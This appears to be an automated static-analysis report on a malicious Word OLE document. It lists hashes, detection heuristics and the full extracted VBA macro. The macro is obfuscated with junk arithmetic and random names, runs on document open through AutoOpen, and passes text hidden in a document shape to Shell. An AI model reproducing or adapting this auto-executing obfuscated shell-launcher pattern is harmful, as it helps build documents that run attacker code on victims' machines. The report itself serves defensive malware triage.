Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 022411990c7ff9f4…

MALICIOUS

Office (OLE)

89.6 KB Created: 2018-12-07 15:57:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 774622bcd1ce99fb6c3f5777aea226e9 SHA-1: 0c4cd96f51f9e93377651708f92746ffdb33ebef SHA-256: 022411990c7ff9f424ac6ddf6d0e4ecc0a83eebfd2e769b21330f2cc3e67325b
252 Risk Score

Heuristics 9

  • ClamAV: Doc.Malware.Generic-6776113-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6776113-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    . _
Shell(miTwSZLziIK, MNlzCRaIX), rKqisosC)
         Set GsDcaLPGpmKjjFZoNXcia = AunVimQGhSwPSmNptiholslX
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
aOTjKd
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6323 bytes
SHA-256: 3796612eec43830c5437a80aa2c0f12c0cbf4b334a8ee7a92dbd53812ca1fbf6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
158 of 198 identifiers look randomly generated (e.g. 'AunVimQGhSwPSmNptiholslX') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "QfAMfBnnwmX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
aOTjKd
End Sub

Attribute VB_Name = "pztohzXbksLB"
Function aOTjKd()
On Error Resume Next
         Set itlLvlMXPDhSRhQz = ufZDwArGIimiXhwQAAC
      TkfwDLZWiMrivWY = BIfsuEnCatsWiCQ
      OqGJAdznbUcwrDjAJtOs = JPOzdVKTDocwLUEQOF / CLng(161164363) * 60670902 / Tan(291604252) + ZbrLXKrMpnYLEbrMW - Cos(49057126) + (272432589 / Int(YjAAfjijuoqicspnFR))
         Set OlKUTXwqiQDsVudI = jJLPPzUfwZvYaiMorsTw
      YKiVtQPIowcQkXplzw = qoVwDRIlrDdBKJJHzdtVjE
      JbTHpGWDutjHjCMfDl = YEKwRHaQqHDdDlRLXkKS / CLng(204150530) * 142285247 / Tan(2032754) + IdCdEnzpkEjTzfBAOqfvr - Cos(108852921) + (188688898 / Int(OrpvtSzCDbooEzLDKN))
         Set izFIQbtbjoAVNmJOTNU = PziApNCuRQouaXihVd
      vkphqwqVcBzfVcPI = PFSDYwJTzGvqDcsqAYmaQ
      DzrZtUkSRKOzRQKJWmfOqqv = YZFpUEchUXCTMzFpihok / CLng(184199360) * 41852427 / Tan(69090485) + frBAuBAMEMAUPvzNijct - Cos(91076049) + (287587974 / Int(XhqfJCKCSOcJdDbmSXpPzwlZ))
         Set fnBQQwATtqLzEXndR = lBtHYQlkwLNrsHHIQdrJL
      HVEXKlVkvTNzjoXY = lifwpGCwEpvHJmIWa
      XCAFzPNPtduXTlrOFifNROC = GwZclhFbItzWOfiQkZN / CLng(163979562) * 26309004 / Tan(214333278) + KQvjirMdIAbzDpldLY - Cos(126666610) + (96669875 / Int(lVAZzOdrBdVZaOMqAaj))
         Set vuwHMfkzfFzzaIqCB = nivjMFnFpGtWSzlGrQAbGiJz
      oboDmJZiIqKVOhrTGpdFI = zOTQaCZsJVwzYdzBDwUnKJ
      kdjJHzpfuaBdajWjXIP = pZQINUFljlUcooinqtStT / CLng(273538000) * 10811699 / Tan(155423203) + AYRhNwiubkLMavnuDw - Cos(60194019) + (34956591 / Int(pmBisiqWNAYtlNvnETo))
         Set BwWHuSSDujVmaUhNCRHbR = PttkoFQVDlkiOdUdLzE
      rkkZChQzAzWUUajcOJdN = YfkBrFEsYGIWlkfITiHoQU
      OQOnwrPBVrrSEzY = bMGcrNziqBUubWYW / CLng(25126472) * 169317642 / Tan(142821067) + dSHAJEnfuRaIvXjcJsNBS - Cos(206935513) + (326813105 / Int(XUawSUOiinhJEGSnaSoYbLw))
         Set tYqARKNCkvlEDwjZNtMcJCQ = uNXYpiWPbLPLHGkXBLz
      AEaqcNHXzsjqIRF = moMGZWdrjXRGJp
      zEIYqnjwbXwPicZDpAf = NwridaiKEwANKRmlztPRF / CLng(286620105) * 245525301 / Tan(234844402) + HuPHTcFiENwNZuPEWrf - Cos(149445896) + (242335143 / Int(RqnEvlOfWNHIWj))
         Set nsSLYDJjDnqslcBRb = sDfhjsjzNfdQsAA
      XiizHXcTFjPFmZIhr = OYjFIafbqdGnuqsUEXmd
      VbMcAcaLnXvYPm = hRVESfhwMSoZNRVlvNc / CLng(297950639) * 321579641 / Tan(151312378) + HzEQCGKOiDPmmBiLUncz - Cos(65973421) + (78515872 / Int(MtRmzLmsfKoNGN))
Set wNLLUSzUM = QfAMfBnnwmX.Shapes(odoMZCv + "OXRjQsRwqhR" + HpXXDZa).TextFrame
         Set NwOQjizzlQojpVvoEfBjQlP = SiZFJmPFzoRYjGQiRvFAA
      OKUizVSzibjfzB = upwAjiADXIwOTOU
      OiOPPkbnunwKqpAJOaXF = ARVOGzZAGzkJvUz / CLng(226561377) * 250102883 / Tan(295969063) + OKFwkpNiIpztrPZO - Cos(112991823) + (300673657 / Int(InBnnnNBuUCach))
         Set jiJUrFbzhFoNwM = wuitulwlaSKYPaKBtciJc
      slkiToOHjAMUVaUhfQlzjBj = LWXEvlNCGFBsILSKWTmJ
      vFkhLwRYiJrEDXwQ = MvnJOPYbZUwaaPPX / CLng(138728387) * 108597043 / Tan(113704191) + XjowibwKnEnWtMGqWChpLF - Cos(251184077) + (185607994 / Int(zDtchiGfcmdHqfmTOo))
         Set ptcCofiIpwzShQCdt = MKCFPwXDLEJkuipVDYitElow
      uUjuEjbpfOlNjijikTawFC = cMNizzubWDPUbrIHU
      vOTEITtwPTRNzksFDiqFc = knOJUJEmcLGRKnvYEtkBka / CLng(64343022) * 61536816 / Tan(26063133) + cWnaQOFFifqwzjucrFHi - Cos(169833984) + (34724123 / Int(fdzUbFJiEFohhzBu))
miTwSZLziIK = wNLLUSzUM.ContainingRange + uUlYtPRL + stWGj + kWNXSIW + NFOXMi + TwIcPXj + hVHXOWl + rdYcMOkZ + wjuOW
         Set bpuAmPfdFQpouuRWwXt = utbBwjnLRuLrIfJohmTVwO
      MAwTKMjjwLrhiOsBFbULKEw = PkcoKDXrjwOBBNdwlOPf
      zbapkNtcCjIBRDZjs = snzAjzrzswVawoTORJ / CLng(15756698) * 338633633 / Tan(171100743) + dPdPGzkJDOtsXrRwsbzkVu - Cos(42584110) + (181503661 / Int(TiCmQhsvCJkXUssOjvGhER))
         Set utswTijJIslKcFobJ = mGGEfdipZraMbEMqWGNunw
      SMzUQDHUzXRKmJpNPRdJsiv = jzmihNPCnPosjJNlS
      doJtajhswcKpwjQinT = ZmkIPXXVzjGEsrVFH / CLng(48913052) * 257932929 / Tan(153450802) + BpOmrwQEcwVuTtk - Cos(294877137) + (211212497 / Int(WCLjMsYRzdiJaAwLXzVWXYG))
         Set JWoouToMWUruzK = zLjGltcjjHRZQsdPQ
      HqwvqZcVpijauiqqmzfYmIh = IjctXUtFazrUPEVKiPDzwF
      mjZFjksIzIImKwjw = lizvnWaicVtWFjtDTq / CLng(65771726) * 331353483 / Tan(96087399) + ViqsLHRLNvRiMSFR - Cos(339732052) + (88413475 / Int(WEOwmuYOiqGZzGXIREuKTQRH))
         Set iwAcmviRJoltUmWzlWa = FwirtRMaHHMHjDXqGWubT
      bBijicsCviWlVkSJjV = IKBbiNROjsObzSjWdNKmj
      EMilvhnXznZrLLZZzWNOM = hDXTmNovYiAaFptt / CLng(118810040) * 232766080 / Tan(175673244) + vaBHGXzENoZUUuf - Cos(204021105) + (90713338 / Int(uaiBPrrkGjfGDinEOGB))
         Set zIzYTqCKOLQdzpRrSY = CwNzjAuIkKmWqOSXBYacEMTt
      dWvcRWRDTDVlJQ = ZhRAcpZOiRPSsvtqiU
      DiwjToUTXKwmsHCDXuTRODIR = BDYHZNrQNNsaBzLH / CLng(142979815) * 19000374 / Tan(24259485) + iXLprWvLDhAWhVSkwLzwF - Cos(142494372) + (201249263 / Int(KcVzHJsAEjjdsjPCSfNfNWt))
         Set NEwrqhwOKcBBukqfMjVvHE = pRFRHusJznITjnwbzz
      kUGWprNVpoGYjIjGal = rURTENmQGsPFWwnUz
      uPauZDUqPYKAjWpiIzSAB = DaGdaikbvokXfVq / CLng(322453627) * 311058506 / Tan(96625125) + OzNFGLsPnooBwhlLznvclFnc - Cos(148203906) + (105437786 / Int(qTsLDDBmLqVARhT))
Const MNlzCRaIX = 0
         Set niUvszrwBMczOzpdklhbJo = ajaFqUnHiWEslLdkwXj
      mqfULoSpftmjwDt = RuAiOEzcJGESGAjDc
      okAGtCCwbkkXthROSDXC = hsDKFkziiKiETPJOLBwbPdM / CLng(291817263) * 252622259 / Tan(83980804) + ArijjakHrzwoSCQzaB - Cos(126089053) + (174104504 / Int(IAHBZbfEjKXsNzqwi))
jHRRPNj = Array(zjmqTmE, raiHwEDLm, vEDZAwz, Interaction _
. _
Shell(miTwSZLziIK, MNlzCRaIX), rKqisosC)
         Set GsDcaLPGpmKjjFZoNXcia = AunVimQGhSwPSmNptiholslX
      HhwpiumGGsJoFccqjFr = TnmaXizzmNHJPubFTRDYJ
      LtEAoBFzCmtnGUu = RAzpUtlAYKBWXRCTaL / CLng(180299642) * 299050681 / Tan(145981025) + pwsoLVQcoHKzzDbUnS - Cos(54455171) + (28407782 / Int(dziZkjZNvsBzuKAzjhP))
         Set EnRGitidjCcNGSiQXszPErmO = BJGVitPFvVjqiOb
      iYUXEdPZGMXkksMACwdjcHBI = ILwzasiWTaTRqEXu
      OSWfVCIinilrUXWMLwSSZ = TsOQStjLrFpusjmhnInQ / CLng(253895093) * 71547799 / Tan(299302252) + wDwFfIFbHizdQEkPzcqf - Cos(12513952) + (169508600 / Int(mZiJJfIuIzjSOwdjjANm))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.